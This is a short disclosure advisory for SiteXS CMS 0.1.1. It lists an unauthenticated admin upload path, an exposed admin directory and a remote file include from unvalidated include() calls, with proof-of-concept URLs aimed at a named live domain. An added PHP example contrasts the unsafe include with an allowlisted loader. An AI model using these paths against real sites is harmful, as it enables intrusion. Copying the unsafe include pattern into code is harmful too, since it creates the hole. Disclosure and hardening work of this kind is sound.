siteXS CMS 0.1.1 Directory Traversal Vulnerability, Arbitrary File Upload, Remote File Include

Discovered by: e.wiZz!
Site: madspot.org
Mail: N/A :D
Info: Thanks to our (Bosnian) presidents (we have 3, eh) for stealing our money, so we don't have anything to eat. cheers
In the wild.......

/* INTRO */
Info: SiteXS CMS is a simple but powerful PHP/MySQL-based CMS. It has a modular structure, uses templates with embedded PHP instructions and gettext for localization.
Download: http://sourceforge.net/project/platformdownload.php?group_id=156247
Script site: sitexs.sf.net
/* OUTRO */

---- Arbitrary File Upload ----
The upload script sits under the admin directory:
http://www.somesiteinwild.com//adm/visual/upload.php
POC:
http://www.sitexs.cn/adm/visual/upload.php?

---- Directory Traversal Vulnerability (other) ----
Directory listing is enabled for /adm/, so everything directly under it can be seen:
http://www.somesiteinwild.com//adm/
Subfolders under /adm/ such as /adm/tinymce/ or /adm/images/ are not listed, though.
POC:
http://www.sitexs.cn/adm/ve.php
http://www.sitexs.cn/adm/wizard.php
http://www.sitexs.cn/adm/modules.sql

---- Remote File Include ----
Vulnerable code in adm.class.php:

    include $file;

and

    include_once "./lib/$className.class.php";

Both include a path built from a variable that is not validated, so whatever ends up in $file or $className decides which file gets included.

Thanks: aluigi, str0ke
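Added example (written for this advisory, not SiteXS code): the two include patterns quoted above in their unsafe form, beside a hardened loader that only includes files from a fixed directory and an explicit allowlist. The directory name, the allowlist entries and the request parameter name are assumptions.

```php
<?php
// Added example, not from SiteXS. LIB_DIR, ALLOWED_CLASSES and the 'class'
// parameter are constructed for illustration.

// --- unsafe pattern (the shape quoted from adm.class.php) ---
// $file / $className come straight from the request, so the request decides
// which file is included (remote URL if allow_url_include is on, or any local
// file reachable by path).
function load_unsafe(string $file, string $className): void
{
    include $file;
    include_once "./lib/$className.class.php";
}

// --- hardened form ---
// 1. The class name must match a strict pattern (no slashes, dots, schemes).
// 2. It must be on an explicit allowlist of known modules.
// 3. The resolved path must stay inside LIB_DIR after realpath().
const LIB_DIR = __DIR__ . '/lib';
const ALLOWED_CLASSES = ['menu', 'page', 'user'];   // constructed allowlist

function resolve_class_file(string $className): ?string
{
    if (!preg_match('/^[a-z][a-z0-9_]{0,31}$/', $className)) {
        return null;                       // bad characters: refuse
    }
    if (!in_array($className, ALLOWED_CLASSES, true)) {
        return null;                       // unknown module: refuse
    }
    $base = realpath(LIB_DIR);
    $path = realpath(LIB_DIR . "/$className.class.php");
    if ($base === false || $path === false) {
        return null;                       // missing dir or file
    }
    // Defence in depth: even a valid name must resolve under LIB_DIR.
    if (strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

function load_safe(string $className): bool
{
    $path = resolve_class_file($className);
    if ($path === null) {
        error_log("refused class include: " . $className);   // log, do not include
        return false;
    }
    include_once $path;
    return true;
}

// Usage: $ok = load_safe($_GET['class'] ?? '');
```

The same rule covers the `include $file;` case: replace the free-form path with a short key looked up in a fixed map, and never hand request data to include() directly.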